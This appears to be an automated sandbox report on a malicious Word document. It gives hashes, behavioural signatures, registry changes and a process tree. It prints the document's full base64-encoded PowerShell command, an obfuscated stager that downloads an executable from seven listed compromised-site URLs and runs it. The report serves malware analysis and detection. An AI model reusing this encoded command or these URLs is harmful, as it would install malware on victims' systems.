Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09/09/2024, 12:31
Behavioral task
behavioral1
Sample
d65159884a302c122a6a6ce7a79b4707_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d65159884a302c122a6a6ce7a79b4707_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
d65159884a302c122a6a6ce7a79b4707_JaffaCakes118.doc
-
Size
195KB
-
MD5
d65159884a302c122a6a6ce7a79b4707
-
SHA1
065345bf6fa9b4e011d36b23c936920daf0123c7
-
SHA256
926ffcd5c140ef8034bb02d721f27d8fca0608d456ab432803be89c0282501e7
-
SHA512
7c260009152bea9541caaaaf7c5b0bb90157980bb24caa7595f2896cdecc9750c20cc5c9f7e085f1e6bd42f19aef6319181ac8765f5e23ef5dd7652c0e001652
-
SSDEEP
3072:922TWTogk079THcpOu5UZGQGSL+sAGNTAp:9/TX07hHcJQfKCN8p
Malware Config
Extracted
https://eaglehatch.com/wp-content/TwA6w6/
https://www.tiendajuanvaldez.com/wp-admin/igkf/
https://aspeninstitute.es/catalogmap/fAatpjn/
https://1horse.ir/wp-includes/7Ev/
https://theshopclubs.com/wp-admin/7/
https://eliteweb.cl/dev-area/6V/
https://stockval.com.br/wp-admin/68K36/
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 5 2324 powershell.exe 6 2324 powershell.exe 8 2324 powershell.exe 9 2324 powershell.exe 11 2324 powershell.exe 12 2324 powershell.exe 15 2324 powershell.exe 16 2324 powershell.exe 18 2324 powershell.exe 20 2324 powershell.exe 21 2324 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BE321623-7576-45BE-8F19-C4DBEF3E7E69}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\TypeLib\{BE321623-7576-45BE-8F19-C4DBEF3E7E69}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BE321623-7576-45BE-8F19-C4DBEF3E7E69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2792 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2324 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2792 WINWORD.EXE 2792 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2700 2792 WINWORD.EXE 34 PID 2792 wrote to memory of 2700 2792 WINWORD.EXE 34 PID 2792 wrote to memory of 2700 2792 WINWORD.EXE 34 PID 2792 wrote to memory of 2700 2792 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d65159884a302c122a6a6ce7a79b4707_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABTAGUAZQBiAHgANgB1AD0AKAAoACcATQAnACsAJwBsADIAOAAnACkAKwAoACcAeQAnACsAJwBzADkAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AVgA6AHUAUwBlAFIAUAByAG8ARgBpAEwARQBcAGcAWQByADEAagBRAEsAXABrAGMAUQBFAEYAaAA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQBSAGUAQwB0AG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBVAHIASQBgAFQAeQBwAGAAUgBvAGAAVABPAGAAQwBvAEwAIgAgAD0AIAAoACcAdAAnACsAJwBsAHMAJwArACgAJwAxACcAKwAnADIALAAnACkAKwAoACcAIAB0ACcAKwAnAGwAcwAxADEALAAgACcAKwAnAHQAJwArACcAbABzACcAKQApADsAJABBAGgAbABhAHQAMQAzACAAPQAgACgAKAAnAEUAYQAnACsAJwB3ACcAKQArACcAMwAnACsAJwBsADgAJwApADsAJABLADUAYgB6AGsAMQBhAD0AKAAnAFYAbwAnACsAJwAxAG0AJwArACgAJwBvAHYAJwArACcAMQAnACkAKQA7ACQAVgBkAHYAYwBtAGcAZQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAJwArACcAfQBHAHkAcgAxAGoAcQBrAHsAMAB9AEsAYwAnACsAJwBxACcAKwAnAGUAZgBoADUAewAwAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABBAGgAbABhAHQAMQAzACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABKAGUAYQBpADkAegBuAD0AKAAnAFgAJwArACcAZgAnACsAKAAnAG8AOQBlAHYAJwArACcAYgAnACkAKQA7ACQASgBtADEAMABlAGkAOQA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAGUAQgBjAEwASQBFAE4AdAA7ACQAUQB3AHUAMgBlADAAdAA9ACgAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwAHMAJwArACcAOgAvACcAKQArACgAJwAvACcAKwAnAGUAYQBnACcAKQArACgAJwBsAGUAaABhAHQAJwArACcAYwAnACkAKwAnAGgAJwArACgAJwAuAGMAbwBtAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACcAdABlACcAKwAnAG4AJwArACcAdAAnACsAKAAnAC8AVAAnACsAJwB3AEEANgAnACkAKwAoACcAdwAnACsAJwA2AC8AJwApACsAJwAqAGgAJwArACcAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAvAHcAdwB3ACcAKwAnAC4AJwArACcAdABpACcAKQArACcAZQBuACcAKwAoACcAZABhAGoAdQAnACsAJwBhACcAKQArACgAJwBuAHYAJwArACcAYQBsACcAKQArACgAJwBkAGUAegAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvAGkAZwBrACcAKwAnAGYAJwApACsAKAAnAC8AKgAnACsAJwBoAHQAdAAnACsAJwBwAHMAOgAvAC8AJwArACcAYQBzAHAAZQBuACcAKwAnAGkAbgBzACcAKQArACgAJwB0AGkAdAAnACsAJwB1AHQAZQAuACcAKwAnAGUAcwAnACkAKwAoACcALwBjAGEAJwArACcAdABhACcAKQArACgAJwBsACcAKwAnAG8AZwBtAGEAcAAvAGYAQQBhAHQAcABqACcAKwAnAG4ALwAqAGgAdAB0ACcAKwAnAHAAcwA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAMQBoACcAKwAnAG8AJwApACsAKAAnAHIAcwAnACsAJwBlACcAKQArACcALgBpACcAKwAoACcAcgAnACsAJwAvAHcAJwArACcAcAAtAGkAJwArACcAbgBjACcAKwAnAGwAdQAnACsAJwBkAGUAcwAvADcARQB2AC8AKgBoACcAKwAnAHQAJwApACsAJwB0ACcAKwAoACcAcAAnACsAJwBzADoAJwApACsAJwAvACcAKwAoACcALwB0AGgAZQBzAGgAJwArACcAbwBwACcAKwAnAGMAJwApACsAKAAnAGwAdQAnACsAJwBiAHMALgBjAG8AJwApACsAJwBtACcAKwAoACcALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpAG4AJwArACcALwAnACsAJwA3ACcAKwAnAC8AKgBoAHQAdABwACcAKwAnAHMAOgAvAC8AZQBsAGkAJwApACsAJwB0AGUAJwArACgAJwB3AGUAYgAnACsAJwAuAGMAJwArACcAbAAvACcAKQArACgAJwBkAGUAJwArACcAdgAtAGEAcgBlAGEALwA2ACcAKwAnAFYAJwArACcALwAqAGgAJwArACcAdAB0ACcAKQArACgAJwBwACcAKwAnAHMAOgAvAC8AcwAnACkAKwAoACcAdABvACcAKwAnAGMAJwApACsAKAAnAGsAJwArACcAdgBhACcAKQArACcAbAAuACcAKwAnAGMAbwAnACsAJwBtACcAKwAoACcALgBiAHIALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnADYAOABLACcAKQArACgAJwAzACcAKwAnADYALwAnACkAKQAuACIAUwBQAEwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABVADQAMgBoAHYAZwBrAD0AKAAnAE0AJwArACgAJwBoACcAKwAnADkAdAA5AGcAdAAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFQAMAB0ADYAcQA0AHgAIABpAG4AIAAkAFEAdwB1ADIAZQAwAHQAKQB7AHQAcgB5AHsAJABKAG0AMQAwAGUAaQA5AC4AIgBEAG8AdwBgAE4AYABsAG8AYQBkAGYASQBsAEUAIgAoACQAVAAwAHQANgBxADQAeAAsACAAJABWAGQAdgBjAG0AZwBlACkAOwAkAEwAZQBqAHkAbAB5AHAAPQAoACcATQBmACcAKwAoACcAMwAnACsAJwBlAGwAYwAnACkAKwAnADAAJwApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFYAZAB2AGMAbQBnAGUAKQAuACIATABlAG4AYABHAGAAVABoACIAIAAtAGcAZQAgADIANAA2ADkAMAApACAAewAuACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACgAJABWAGQAdgBjAG0AZwBlACkAOwAkAEwAdQB3ADYAdABsAGcAPQAoACgAJwBIADIAJwArACcAMQAnACkAKwAoACcAMwA1ACcAKwAnADAAJwApACsAJwAyACcAKQA7AGIAcgBlAGEAawA7ACQAWQByAGEAbQBvADAAZQA9ACgAKAAnAEIAJwArACcAMgBwACcAKQArACcAcAAnACsAKAAnAGYAJwArACcAbwBwACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAGcAdAB4ADgAdwA5AD0AKAAnAEIAJwArACgAJwA1AGEAOAAnACsAJwB6ADkAeAAnACkAKQA=1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5849aba3fce0f0804fc7ca6942e75dc84
SHA17d21262e16c82fe7f14553ddbba4d5c85ad7a6de
SHA256604c17a029f794f0cde363c2f2e3fca6607b041857e3a0fce1a9188dcac17664
SHA51290bf7473c4d428a4db5009c5812dc6de06a1ac76929f3a9de5cde094e67933f6e1e09dfe5131ac045e70ee74f26994a7dc8c7585115ff296e2b3c516ae5d4ed2